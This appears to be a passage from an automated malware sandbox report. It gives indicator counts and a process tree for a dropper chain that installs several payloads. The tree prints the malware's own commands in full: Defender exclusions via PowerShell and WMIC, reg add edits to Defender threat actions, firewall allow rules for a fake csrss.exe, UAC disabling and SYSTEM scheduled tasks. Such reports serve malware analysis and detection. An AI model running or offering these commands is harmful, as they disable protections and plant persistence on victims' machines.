3784	chrome.exe
3784	chrome.exe
3784	chrome.exe
3784	chrome.exe
3784	chrome.exe
3784	chrome.exe
3784	chrome.exe
3784	chrome.exe
3784	chrome.exe
3784	chrome.exe
3784	chrome.exe
3784	chrome.exe
3784	chrome.exe
3784	chrome.exe
3784	chrome.exe
3784	chrome.exe
3784	chrome.exe
3784	chrome.exe
3784	chrome.exe
2372	bcb8ba0b64.exe
3784	chrome.exe
2372	bcb8ba0b64.exe
2372	bcb8ba0b64.exe
2372	bcb8ba0b64.exe
2372	bcb8ba0b64.exe
2372	bcb8ba0b64.exe
2372	bcb8ba0b64.exe
2372	bcb8ba0b64.exe
2372	bcb8ba0b64.exe
2372	bcb8ba0b64.exe
2372	bcb8ba0b64.exe
2372	bcb8ba0b64.exe
2372	bcb8ba0b64.exe
5788	u1oo.1.exe
5788	u1oo.1.exe
5788	u1oo.1.exe
5788	u1oo.1.exe
5788	u1oo.1.exe
5788	u1oo.1.exe
5788	u1oo.1.exe
2372	bcb8ba0b64.exe
2372	bcb8ba0b64.exe
2372	bcb8ba0b64.exe

Suspicious use of SendNotifyMessage 38 IoCs

pid	Process
2372	bcb8ba0b64.exe
2372	bcb8ba0b64.exe
2372	bcb8ba0b64.exe
3784	chrome.exe
3784	chrome.exe
3784	chrome.exe
3784	chrome.exe
3784	chrome.exe
3784	chrome.exe
3784	chrome.exe
3784	chrome.exe
3784	chrome.exe
3784	chrome.exe
3784	chrome.exe
3784	chrome.exe
2372	bcb8ba0b64.exe
2372	bcb8ba0b64.exe
2372	bcb8ba0b64.exe
2372	bcb8ba0b64.exe
2372	bcb8ba0b64.exe
2372	bcb8ba0b64.exe
2372	bcb8ba0b64.exe
2372	bcb8ba0b64.exe
2372	bcb8ba0b64.exe
2372	bcb8ba0b64.exe
2372	bcb8ba0b64.exe
2372	bcb8ba0b64.exe
2372	bcb8ba0b64.exe
5788	u1oo.1.exe
5788	u1oo.1.exe
5788	u1oo.1.exe
5788	u1oo.1.exe
5788	u1oo.1.exe
5788	u1oo.1.exe
5788	u1oo.1.exe
2372	bcb8ba0b64.exe
2372	bcb8ba0b64.exe
2372	bcb8ba0b64.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4124 wrote to memory of 3620	4124	6be1d143ed26ed0cd8e2d376c7c1024c149b0bc0be57091088472a473c8eb39e.exe	80
PID 4124 wrote to memory of 3620	4124	6be1d143ed26ed0cd8e2d376c7c1024c149b0bc0be57091088472a473c8eb39e.exe	80
PID 4124 wrote to memory of 3620	4124	6be1d143ed26ed0cd8e2d376c7c1024c149b0bc0be57091088472a473c8eb39e.exe	80
PID 3620 wrote to memory of 4868	3620	explorta.exe	81
PID 3620 wrote to memory of 4868	3620	explorta.exe	81
PID 3620 wrote to memory of 4868	3620	explorta.exe	81
PID 3620 wrote to memory of 4868	3620	explorta.exe	81
PID 3620 wrote to memory of 4868	3620	explorta.exe	81
PID 3620 wrote to memory of 4868	3620	explorta.exe	81
PID 3620 wrote to memory of 4868	3620	explorta.exe	81
PID 3620 wrote to memory of 4868	3620	explorta.exe	81
PID 3620 wrote to memory of 4868	3620	explorta.exe	81
PID 3620 wrote to memory of 4868	3620	explorta.exe	81
PID 3620 wrote to memory of 4868	3620	explorta.exe	81
PID 3620 wrote to memory of 4868	3620	explorta.exe	81
PID 3620 wrote to memory of 4348	3620	explorta.exe	83
PID 3620 wrote to memory of 4348	3620	explorta.exe	83
PID 3620 wrote to memory of 4348	3620	explorta.exe	83
PID 4348 wrote to memory of 4840	4348	amert.exe	84
PID 4348 wrote to memory of 4840	4348	amert.exe	84
PID 4348 wrote to memory of 4840	4348	amert.exe	84
PID 3620 wrote to memory of 2784	3620	explorta.exe	85
PID 3620 wrote to memory of 2784	3620	explorta.exe	85
PID 3620 wrote to memory of 2784	3620	explorta.exe	85
PID 4840 wrote to memory of 5100	4840	explorha.exe	86
PID 4840 wrote to memory of 5100	4840	explorha.exe	86
PID 4840 wrote to memory of 5100	4840	explorha.exe	86
PID 5100 wrote to memory of 1520	5100	swiiiii.exe	88
PID 5100 wrote to memory of 1520	5100	swiiiii.exe	88
PID 5100 wrote to memory of 1520	5100	swiiiii.exe	88
PID 5100 wrote to memory of 1520	5100	swiiiii.exe	88
PID 5100 wrote to memory of 1520	5100	swiiiii.exe	88
PID 5100 wrote to memory of 1520	5100	swiiiii.exe	88
PID 5100 wrote to memory of 1520	5100	swiiiii.exe	88
PID 5100 wrote to memory of 1520	5100	swiiiii.exe	88
PID 5100 wrote to memory of 1520	5100	swiiiii.exe	88
PID 4840 wrote to memory of 5036	4840	explorha.exe	92
PID 4840 wrote to memory of 5036	4840	explorha.exe	92
PID 4840 wrote to memory of 5036	4840	explorha.exe	92
PID 3620 wrote to memory of 2372	3620	explorta.exe	93
PID 3620 wrote to memory of 2372	3620	explorta.exe	93
PID 3620 wrote to memory of 2372	3620	explorta.exe	93
PID 2372 wrote to memory of 3784	2372	bcb8ba0b64.exe	94
PID 2372 wrote to memory of 3784	2372	bcb8ba0b64.exe	94
PID 4840 wrote to memory of 1180	4840	explorha.exe	96
PID 4840 wrote to memory of 1180	4840	explorha.exe	96
PID 4840 wrote to memory of 1180	4840	explorha.exe	96
PID 3784 wrote to memory of 4388	3784	chrome.exe	99
PID 3784 wrote to memory of 4388	3784	chrome.exe	99
PID 1180 wrote to memory of 5072	1180	swiiii.exe	101
PID 1180 wrote to memory of 5072	1180	swiiii.exe	101
PID 1180 wrote to memory of 5072	1180	swiiii.exe	101
PID 1180 wrote to memory of 5072	1180	swiiii.exe	101
PID 1180 wrote to memory of 5072	1180	swiiii.exe	101
PID 1180 wrote to memory of 5072	1180	swiiii.exe	101
PID 1180 wrote to memory of 5072	1180	swiiii.exe	101
PID 1180 wrote to memory of 5072	1180	swiiii.exe	101
PID 1180 wrote to memory of 5072	1180	swiiii.exe	101
PID 3784 wrote to memory of 2076	3784	chrome.exe	102
PID 3784 wrote to memory of 2076	3784	chrome.exe	102
PID 3784 wrote to memory of 2076	3784	chrome.exe	102
PID 3784 wrote to memory of 2076	3784	chrome.exe	102
PID 3784 wrote to memory of 2076	3784	chrome.exe	102
PID 3784 wrote to memory of 2076	3784	chrome.exe	102

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file300un.exe

C:\Users\Admin\AppData\Local\Temp\6be1d143ed26ed0cd8e2d376c7c1024c149b0bc0be57091088472a473c8eb39e.exe
"C:\Users\Admin\AppData\Local\Temp\6be1d143ed26ed0cd8e2d376c7c1024c149b0bc0be57091088472a473c8eb39e.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:4124
- C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
  "C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:3620
- - C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
    "C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    PID:4868
- - C:\Users\Admin\AppData\Local\Temp\1000019001\amert.exe
    "C:\Users\Admin\AppData\Local\Temp\1000019001\amert.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:4348
  - - C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
      "C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:4840
    - - C:\Users\Admin\AppData\Local\Temp\1000066001\swiiiii.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000066001\swiiiii.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:5100
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:1520
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5100 -s 888
        6⤵
        Program crash
        
        PID:2772
    - - C:\Users\Admin\AppData\Local\Temp\1000071001\jok.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000071001\jok.exe"
        5⤵
        Executes dropped EXE
        Modifies system certificate store
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5036
    - - C:\Users\Admin\AppData\Local\Temp\1000073001\swiiii.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000073001\swiiii.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:1180
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:5072
    - - C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe"
        5⤵
        UAC bypass
        Windows security bypass
        Executes dropped EXE
        Windows security modification
        Checks whether UAC is enabled
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        System policy modification
        
        PID:3492
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe" -Force
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4260
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
        6⤵
        Drops startup file
        Suspicious use of AdjustPrivilegeToken
        
        PID:1632
        
        C:\Users\Admin\Pictures\XMhZgF79lMDTbVO6UFYlFLlT.exe
        
        "C:\Users\Admin\Pictures\XMhZgF79lMDTbVO6UFYlFLlT.exe"
        7⤵
        Executes dropped EXE
        
        PID:2184
        
        C:\Users\Admin\AppData\Local\Temp\u1oo.0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u1oo.0.exe"
        8⤵
        Executes dropped EXE
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:4152
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4152 -s 2440
        9⤵
        Program crash
        
        PID:2236
        
        C:\Users\Admin\AppData\Local\Temp\u1oo.1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u1oo.1.exe"
        8⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:5788
        
        C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
        9⤵
        
        PID:3296
        
        C:\Users\Admin\Pictures\uZoEwqzalxW277e1FwIzuepd.exe
        
        "C:\Users\Admin\Pictures\uZoEwqzalxW277e1FwIzuepd.exe"
        7⤵
        Executes dropped EXE
        
        PID:664
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2260
        
        C:\Users\Admin\Pictures\uZoEwqzalxW277e1FwIzuepd.exe
        
        "C:\Users\Admin\Pictures\uZoEwqzalxW277e1FwIzuepd.exe"
        8⤵
        
        PID:6376
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5332
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        9⤵
        
        PID:5104
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        10⤵
        Modifies Windows Firewall
        
        PID:5736
        
        C:\Users\Admin\Pictures\XObYPJVnfZkA98Rj19ulAF4V.exe
        
        "C:\Users\Admin\Pictures\XObYPJVnfZkA98Rj19ulAF4V.exe"
        7⤵
        Executes dropped EXE
        
        PID:2960
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5732
        
        C:\Users\Admin\Pictures\XObYPJVnfZkA98Rj19ulAF4V.exe
        
        "C:\Users\Admin\Pictures\XObYPJVnfZkA98Rj19ulAF4V.exe"
        8⤵
        
        PID:6432
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7100
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        9⤵
        
        PID:6696
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        10⤵
        Modifies Windows Firewall
        
        PID:4784
        
        C:\Users\Admin\Pictures\8Ku8RT30AG6wuz4ms5wfV4v4.exe
        
        "C:\Users\Admin\Pictures\8Ku8RT30AG6wuz4ms5wfV4v4.exe"
        7⤵
        Executes dropped EXE
        
        PID:552
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5876
        
        C:\Users\Admin\Pictures\8Ku8RT30AG6wuz4ms5wfV4v4.exe
        
        "C:\Users\Admin\Pictures\8Ku8RT30AG6wuz4ms5wfV4v4.exe"
        8⤵
        
        PID:6412
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4260
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        9⤵
        
        PID:6024
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        10⤵
        Modifies Windows Firewall
        
        PID:2772
        
        C:\Users\Admin\Pictures\4vS2xD4fZskADp3QIps2U7bX.exe
        
        "C:\Users\Admin\Pictures\4vS2xD4fZskADp3QIps2U7bX.exe"
        7⤵
        Executes dropped EXE
        
        PID:3372
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5416
        
        C:\Users\Admin\Pictures\4vS2xD4fZskADp3QIps2U7bX.exe
        
        "C:\Users\Admin\Pictures\4vS2xD4fZskADp3QIps2U7bX.exe"
        8⤵
        
        PID:6840
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6500
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        9⤵
        
        PID:6608
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        10⤵
        Modifies Windows Firewall
        
        PID:5420
        
        C:\Users\Admin\Pictures\ZX5vUkJZlFifafkY46SOBxVX.exe
        
        "C:\Users\Admin\Pictures\ZX5vUkJZlFifafkY46SOBxVX.exe"
        7⤵
        Modifies firewall policy service
        Windows security bypass
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Windows security modification
        Checks whether UAC is enabled
        Drops file in System32 directory
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:5604
        
        C:\Users\Admin\Pictures\Tice5cXpVv9uRXg0TXphyjM6.exe
        
        "C:\Users\Admin\Pictures\Tice5cXpVv9uRXg0TXphyjM6.exe"
        7⤵
        
        PID:3680
        
        C:\Users\Admin\AppData\Local\Temp\7zS15E4.tmp\Install.exe
        
        .\Install.exe /ThYFdiduvbI "385118" /S
        8⤵
        
        PID:5928
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        9⤵
        
        PID:2364
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        10⤵
        
        PID:4388
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        11⤵
        
        PID:5400
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        12⤵
        
        PID:3220
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        10⤵
        
        PID:3912
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        11⤵
        
        PID:1772
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        12⤵
        
        PID:5408
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        10⤵
        
        PID:3064
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        11⤵
        
        PID:2772
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        12⤵
        
        PID:6484
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        10⤵
        
        PID:6784
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        11⤵
        
        PID:6800
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        12⤵
        
        PID:7072
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        10⤵
        
        PID:5492
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        11⤵
        
        PID:5464
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6072
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        13⤵
        
        PID:5396
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        9⤵
        
        PID:4596
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        10⤵
        
        PID:2320
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1952
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        12⤵
        
        PID:5356
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 11:59:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS15E4.tmp\Install.exe\" it /qbUdidUKAw 385118 /S" /V1 /F
        9⤵
        Creates scheduled task(s)
        
        PID:5244
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
        9⤵
        
        PID:2868
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        10⤵
        
        PID:6284
        
        \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        11⤵
        
        PID:6468
        
        C:\Users\Admin\Pictures\rFWF2bFUAeZ7VoOHouE1OiHu.exe
        
        "C:\Users\Admin\Pictures\rFWF2bFUAeZ7VoOHouE1OiHu.exe"
        7⤵
        
        PID:6948
        
        C:\Users\Admin\AppData\Local\Temp\7zS5B4A.tmp\Install.exe
        
        .\Install.exe /ThYFdiduvbI "385118" /S
        8⤵
        
        PID:7024
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        9⤵
        
        PID:6172
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        10⤵
        
        PID:5416
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        11⤵
        
        PID:5340
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        12⤵
        
        PID:5840
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        10⤵
        
        PID:5188
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        11⤵
        
        PID:5256
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        12⤵
        
        PID:1688
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        10⤵
        
        PID:1984
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        11⤵
        
        PID:2516
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        12⤵
        
        PID:5580
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        10⤵
        
        PID:3876
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        11⤵
        
        PID:7068
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        12⤵
        
        PID:6992
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        10⤵
        
